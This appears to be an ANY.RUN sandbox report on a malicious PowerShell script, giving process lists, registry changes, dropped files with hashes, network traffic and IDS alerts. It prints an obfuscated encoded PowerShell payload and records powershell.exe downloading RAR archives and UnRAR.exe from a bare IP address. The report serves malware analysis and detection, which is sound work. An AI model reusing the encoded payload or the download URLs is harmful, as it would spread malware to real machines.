AEUAQABpACAAOABLAEMAPABbADkAcwBYAHcAUwBOACEAeQAtADkAbABjAH0AIwBaAGcAawBmAEgAXwBRAHoAagBvAHUAUQA1AHYANwBjAGIAdABFAG4AQwB1AD8AagBkAGMAWQAtAEgAMwBKAHYAUgBNAFEAUwBlAEEAbwBiAGEAMgB4AFAAaQB2AFEAdQBoAHYAYwBDAFcARAA8AFYAWwA4ADoAXwBvADkARgBTAEQAdwA/ADUARwBTAGcAagAmACYAZgAwAGkAKgB9AG0AaABUAGMATgA5AEAAWABKAGkAYQB4AFQAMQAgAF0ASwBnADIAQABvAEIAIABYAHIAbwBuAFIAWQBQACQAXQBYAF4ANABCAEYANgBwADMASwBDAFMAZQA2AGIARgBfAE8AYQA0AFAAJAApAE4ANABaADkAYgBjACUAUQBIAH0AMQBJAGUAKQA0ACgAVQBHAGsAMQBBADkAQABuAGMAUQAjACoAagB2AHMAeQB4AFEAOwA0ADoAbAAkAEUAZAAtAFAAcgBuAGYAfQBeAGwAcABSAGEAZwBdACoAOgA/AEUANgB9ADwAfQBnAEEALQAxAGsAKgBKAFsANwA0ADwASQApAGkAbABPAHwAdwA0AGsAZAAgAEIATwA7AGEAaAA5ACUAdQBYAFYAMABpAHIAYwB5ADQAdABUADgAIABdACQARwA+AE4APwBbAEoAYQBjAGIAeQB4AGEAJgBhAGwAPwBiAE4AVABaAGsAXQBYAF0AXwA2AFgAdwAmAGQALgA5AGgAUwBqAF0AcwBsAD8AIwBRACEASABMAD8AIABUAEoAdABRAGIAWQBPAHUAQABVADMAaABCAFoAewBsADkASgA0ADIAYgBwADsAeABYAHIAOwA4ACQAPgA7AFoAYwB6ACAATgBSAEcAawBuACgAeABnAEAAZgAzAHMAcgBBAGgAfQBWAD0AKgBKAGsAIwBLAG4AaABdAEIAKgBfAGwASgB5ACAADQAKACMAIAB6AEsAOgBwAGQALQBJAC4ASQBTAGwAXwBSAGIAWQByACUAZAB4ACwAQgB9ACYAVwBeAFcAcgBhACAAZABDACwAJgB0AGcAMAAqAC0AOQBnAEUAWABoAEwAQgBwAE0AKAA3AGwAeABIACoAewArAD0AWwBvAGcAJABqACUAKwBAAHYANgBCAHcANQBwAHUAPQAtAEQAQgBDAFYAKgBWAEEAWQBAAGsAVABYAHcASwBkAHYAbgBoAGUAcABCACAAPAB1ADsASAAqADAAbgA5AGYAcAA3AEIALAByAEoAMwBDAGcAOgBSAHwAYQAqAHMAOABqAEsASQBpADEAOgBTAHUAcwBQAFQAUAB3ADQAZwBxAHkAMwByAGIAOgA1AF4AUgBnAHIAQwBLAE4AMwBNAHAAZQAhAGgAfQBnAFQATgA/AGIAdwBEACUAYgB2AEQAeAAhAEUAMAAoAFAAfABKADEARQBnADIARgBFAGcAdQAmAEcAfQBsACMAZgA8AE0AZwBrACkALAB1AFEAUQBtACYANwA/AFsAZAAqAEoAUwBGAG8ALgBfAGYAZgB1AFgAdgAuAEgAdwBzADkAUgBJADUAKgBeAG0AOwBSADoATAB3ADgAYwAhACwATQA+AFYAYQBMAE0AZABRAF8AcQBzAEEAbgBLAFkAMAApACwAcQBPAC4AUQBzAFsALgAjACgAYwBkAFAAKQB0AEMAKwBnAHUAbgBbAHEAegAyAHsAKwBwAEUAeABQAEcAfABnAEUAQgBuACwAYgAwACYANgBbAHEAPQBnAHIAXgBCAE4AdgBTAEcAewBBADgAYwArAF4AUQBNADIAUQBAACQATAB7ACYAZwBWACQAMQBrAGYANQBNAHMAXgBxADEAVABaAG4ANAA8AGsAXgBKAEAAQQBpADsAYwB4AC4AQgAuAFQALgBvACoAVQBwAC4AMgBiAEYALgBrACsAYgAuAHcAUAAqADkAVgA9AGYARABvAE0AMgA8AFMAKAAwAGQAbQBWAGIALABPAEkAdgBVAHAANAAkAEIAWgBGAFMAVgBuAFAAPQBPAHYANwBeAEYAXwBAAGIAUwA8ADoAWgBwACAAewB7AGMAbgB1AGwAUwBSADQAcQB3AHkAfQBZAGwAPABUAFQAcQAjAEsAQQB3AF4AaQB9AHIAWgBzAFUARwBlADYAZABpAE8AbABuAGEAKQBsAD0ASwBhAEIAYgBqAFgAVQAsAEAAdwB2ADMAfQB3AGUAMQBpAFEAYQA0AHMATwA+ADsAagAzACwANwAmAHQAKwB1AC0AJgBnAF8AUwAsAHwAPAByAEMAMgBIAE0AIQBDAEYAbABWAFAAPQAgADUAPABdAFEAdwA9AHUALgBIAEkARwBqAEUANgA3AEUAJAA/ADIAXQB4AFcAWwBnADcAeABWAFMARgA0ADYAKgAtADsAeABvAHwAQwB4AEkAWQBhADwAYQAkAC4AXgAtAEoAdAAmAGEAegA6AGoAJABaADsAPQBfACYANgBJAF8AUwAqAHIATgBdADcARAA9AEIAOwB9ACgARgB2AGcALgBRAHYAWQB2AHEAOABXAGsAJQAqAC0AOwBSACQATQBXACQAMAAmAG4ATABKADIAMwA7AHEAXwAkAEgATABAAEcAVABaAG8ATgBtAFcAdQBEAEAALgAgAHsAfQBkADcAUQA7AG4AIQAgAFYAUwBrAEYANwAmACEAUgByAGsAfABiAF0ARQBMAGMATwA2AC0AIwAhAEgAbgAyAHAAcAAlAE4AYwBVADQALABJAHcAQgBmAEUANgB5AF8APwBWAHUAIAA6AEEAcgBTAD4ARQBrAG0AdABxAGIAdQBwAG8AdQBfADoARwBzAG4AaAAjAF8ATQAuAHoANQBoAEQAbAByAGYAfABhAFsAVwBuAEUASABjAEYAeABMADIATQBLACEAUAA9AD0AOAAgAF8ALgBIAFkAaQBDAC4ATgBMAEMAfQBZAGQARgBGAGkARQBeAF0ALABQAF4AagAtADAAUAAjACkAcQBfAEIAUQBVAF8AOQB2AE0ANABWAEoAcQBPAGMAKgB7ACAASwAwAHoAfABUAFQAKgB6AEwAaQBlAFAAcQBtAGUANQBRAGYAaQBWAEkAQgA9AFIAUQBmAF8APwBZAGIAaABKAEUAaAApAHgAcAAwADEAcwB7AHwAIABQAEMANgA5AEIARgB2AGcAMQBiAHoAeQBTAEEAQgB0AFcAJgBeADsALgAzAGQAaAAmAHUAWgBHACYARwBdADMAagBWADYAaAANAAoAIAAgACAAIAAgACAAIwAgAD0AOQB1AEgALQA8AF8AZgBDAF8AcAApAHAAIwBQAGkAYQB2AFMAUwApAFYAcABoAGoATQAuACAAWwA2AFIAWQB3AH0AJAAqAFgAdAB9AFsAZgBNACMAcgAgAGYALgAlAEUASgAyAF4AVgBbADkAIABXACEATQBDAHYAIQA3ADwATAAjACwAZAA/ADIAWAA+AD8AVgBkAEEANQBqAEsAJgBsAD4ALgBjAHgAXQAlAGgAPgBYADgATAAwAEQAKwBxADwAbAApAHEAQQArAE8AcABYACwAMwB1AFMAZwAmADMAaAA4ACoAWgBYADcALgBzADsAdgBPAFIAdQBRADQAdABOAEoASwB0ADQAUgByACgAfAAkACMAIwB9AHAAZQBuAHIAaQB3ACYALABCAEYAMABbAD0ANQA7AGEAXQB3AHgAPABRAHQAKQBnACAALQB1AE4AIQBDAHgAegA8AGIAWABZADAANABZAHcAUABoAFkAQQAyAE8AIAB1AHMAJQBiACwALgB9ACQAPwAzAGsANgBFAG4AfQAxAGkAWwBjAGQAPwApAFgAPwB6AHgALAB5AEEAZQAqAHYAMAApAE4AaQA5AE8ASwBPAEwASwBoAFQAZgA9ADQAawBRAE8ATQA5AG4ARQB6AEMANwBaAEwAPgBmADwAdgBoACMAcABAAGoAKgB0AHYAKQB7ADoAIQBlACwAPQBJACwAdABSADkAPQAsAHcARwAsAGoAYQBBAD0AQQAsADkAQwBHAE0AQwBtADYARgBdAGkANABdAEwAYQBXAD4AZAAyADAAKAA/AH0AcAAuAE4AbgAwAFcAbABoADgASQBoAGEANQAhADwAdAAyAEgAJAAxAFMAfQBOAEwAQAA5ACUAVgBxAEUAfQB8AC4AZwA/ADsAIQBoAGUANQBjAE4AXQBFAD0AdABnADsAKABfACUAbAB0AGIAZABBAGYANAB4ACYAIAB9AE4AOQBrAG0ANgB9AEgALgApAC4AbgA4ADgAWwBHAFQAUAAgAC0AMwBmAFQAcAAuADUAcABHAHEAKAA6ACoARwBbAD4AWgBtAGkATQBCAFoAcwBGAEcANwBzAHwAVgBMAGMATQA3ADEAYgAlADMASgAoAD4AUQBfAF0AUABfADcAPAA1ACwAOQBSAE4AeQAyAHUAXgAuAG0AaABVAFcAbwA4AFkAOABBAHIALgAyAEMAZgA1AGIAWQArAD4AagAtADQASQBLAE4AcQBlAFAARABIAGIAWQA8AFEAcwB6ACQAWQBnADwAPgBnADoAPQBMAE4AdgA+ADEAPQA1ADcANQBCAGgALABvAGYAKwBAAFQAYQAkAEQAWwA2AGoAOQBLADEAKQBsAF4AXgA7ADYAaAArAGsARwBdAGgAPQBhACsAMgBKAHAAcQB3AEMAXwAqADUAeQBSAF4AJQBKAFcAcQBMAEoAKwAmAGcAaQBSAEwALABKACwAWAB6AE4AXwBmAHAAPAA5ACYAWgBPACMAOwAuAHgAcwBaACoAagBtADwARwB8AEEAPgBJAHcAagBdAEAAOQA6AGkAfQAqAE8AcAB2AHUATQBqAG4AZwBpAEMAaAAxAFUAOQBvAFsAbQB2AF4AWwBGAFIASwAyAFkAfQBMAF8AbwBQAGYASQA7ADQAJgBnAHwATwBfACgALQBEAEEAdQBPAHEAXQBTAHYAPABbAFkASgBIACAAaQBdAEkAbQB0AHAATQBOACEAWwBnAEkAeQBNADgAVgBFACQAKgBwADYANwAwAF0ASwBnAFkAKgA+AHsAJABtAHgAZABJAG8ATABjAG4AdgBSAH0AZABpAFQARgBUAHgAIwB1AEMANQBFAEEAfQBGACQAXQBUAH0AdQBXAGwAYQAjAEIAXQAoAE0AcgAqAGoAJABHACQASgBvAGkAewAhADEAKwBrACsAJgBDAHQATwBzAEQASQBoAHkAYgBMADUAXgBiAF8ASQA0AFsAdgBhAHoAXgBDAEEAPAB9AEIAewAhAEQASAAlACEAcwAsAC4ARQBTAEEAVABfAEwAWgAqACwAcgA5AGMAUgB6ACUAPwBNAGcAdgAjAD8APAB5AF0AYgBHAD4AZQA/ADoAVAAqAD4AVQBBAGEAfAB5ADoAXgA9ACQAegBsAC0AKwApACoAIQBIAEcASQApAGcASgA0AGwAcQBkAHQAcwB4ACAAJQAtAGoAdwBLACYASABBADUANwAqAEQAXQBoAHwAKwAwACYAQwBCAHQAKQB6AF4AfAA8ADMANQBRACkAWQBnAGQAKwBGAF0AKwBDACEADQAKACAAIAAgACAAIAAgACAAIAApAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
724"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --string-annotations --field-trial-handle=2428,i,9643899405495034576,4353840507900262531,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=2364 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
756"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,10950093268647784330,7984345445053328003,262144 --variations-seed-version --mojo-platform-channel-handle=3152 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
768"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffc44bffff8,0x7ffc44c00004,0x7ffc44c00010C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
864"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2080,i,4489154245050807712,13119722728266116525,262144 --variations-seed-version --mojo-platform-channel-handle=2076 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
Total events
128 400
Read events
128 327
Write events
73
Delete events
0

Modification events

(PID) Process:(4800) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(4800) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(4800) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1688) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(1688) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(1688) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(1688) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
0
(PID) Process:(1688) chrome.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
Operation:writeName:usagestats
Value:
0
(PID) Process:(424) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(424) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
2
Executable files
8
Suspicious files
190
Text files
451
Unknown types
0

Dropped files

PID
Process
Filename
Type
3864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4NL5POU6SAMWG033QEY8.tempbinary
MD5:7863A3AC88C2D0015D97DE71E1819943
SHA256:F038388422789331D579058396F8D9720A0EB77E0BB99356663BD6E127944CE0
2220powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gi2fn34n.e44.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5080UnRAR.exeC:\Users\admin\AppData\Local\Temp\upsv3.txttext
MD5:F87EB078D8B3CC329451D4319CA4C531
SHA256:2B970ECC7619434A8DF09A0D95D95C9E564F5BD2F045EC1D2747414C921D14E1
2220powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gyb4klht.j55.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2764powershell.exeC:\Users\admin\AppData\Local\Temp\upsv3.rarcompressed
MD5:40DF15C1FC1DC49DD9DF3CE4792C43E7
SHA256:84BAAA4449A2133DA47602E2F0B5212F5F96AA2444ED33847B2F8DDDBF1CB625
2764powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gr0x0ewz.oim.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2764powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uxzfn5j0.p0b.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2764powershell.exeC:\Users\admin\AppData\Local\Temp\lgn1ztzq.cmdlinetext
MD5:C545D4C55284462961668FDC7640F242
SHA256:F20E27DF9439CC66140B3039B547A2C9D9F245712C055D8EE94DC7F75B59BABA
3864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF175890.TMPbinary
MD5:00A03B286E6E0EBFF8D9C492365D5EC2
SHA256:4DBFC417D053BA6867308671F1C61F4DCAFC61F058D4044DB532DA6D3BDE3615
3864powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_so2dtnjx.4u2.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
23
TCP/UDP connections
251
DNS requests
336
Threats
17

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2764
powershell.exe
GET
200
5.252.153.72:80
http://5.252.153.72/uploads/upsv3.rar
unknown
unknown
1268
svchost.exe
GET
200
23.55.110.193:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2764
powershell.exe
GET
200
5.252.153.72:80
http://5.252.153.72/UnRAR.exe
unknown
unknown
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5124
powershell.exe
GET
200
5.252.153.72:80
http://5.252.153.72/UnRAR.exe
unknown
unknown
5124
powershell.exe
GET
200
5.252.153.72:80
http://5.252.153.72/uploads/kapewner.rar
unknown
unknown
6216
chrome.exe
GET
200
142.250.186.110:80
http://clients2.google.com/time/1/current?cup2key=8:E_X7GdDIZoLJpJoYVMCxSXYKZpEcxRtn_NwVZEwaAGE&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
2132
chrome.exe
GET
200
142.250.186.110:80
http://clients2.google.com/time/1/current?cup2key=8:Y4yg5ZQTETzvJDQXaXXIKfoK9KDbZN24mI56uGdx2sc&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
2804
chrome.exe
GET
200
142.250.186.110:80
http://clients2.google.com/time/1/current?cup2key=8:dya5W7aAtYIm5Pn_95E4u7afCWWjBa2TJyca29fqqZU&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
2520
chrome.exe
GET
200
142.250.186.110:80
http://clients2.google.com/time/1/current?cup2key=8:ILT9L6cUtG6c4S18iT9C0AMHzZ7tOq5YvfjD3KGtRpQ&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5944
MoUsoCoreWorker.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
5372
RUXIMICS.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1268
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
2764
powershell.exe
5.252.153.72:80
PA
unknown
1268
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1268
svchost.exe
23.55.110.193:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1268
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
5124
powershell.exe
5.252.153.72:80
PA
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.16.206
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 23.55.110.193
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
t.me
  • 149.154.167.99
whitelisted
steamcommunity.com
  • 104.102.49.106
whitelisted
activation-v2.sls.microsoft.com
  • 20.83.72.98
whitelisted
clients2.google.com
  • 142.250.186.110
whitelisted
safebrowsingohttpgateway.googleapis.com
  • 142.250.74.202
whitelisted
clientservices.googleapis.com
  • 216.58.208.99
  • 142.250.185.195
whitelisted

Threats

PID
Process
Class
Message
2764
powershell.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host RAR Request
2764
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2764
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
2764
powershell.exe
Misc activity
ET INFO Request for EXE via Powershell
2764
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2764
powershell.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
2764
powershell.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
5124
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
5124
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
5124
powershell.exe
Misc activity
ET INFO Request for EXE via Powershell
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
/wp.ps1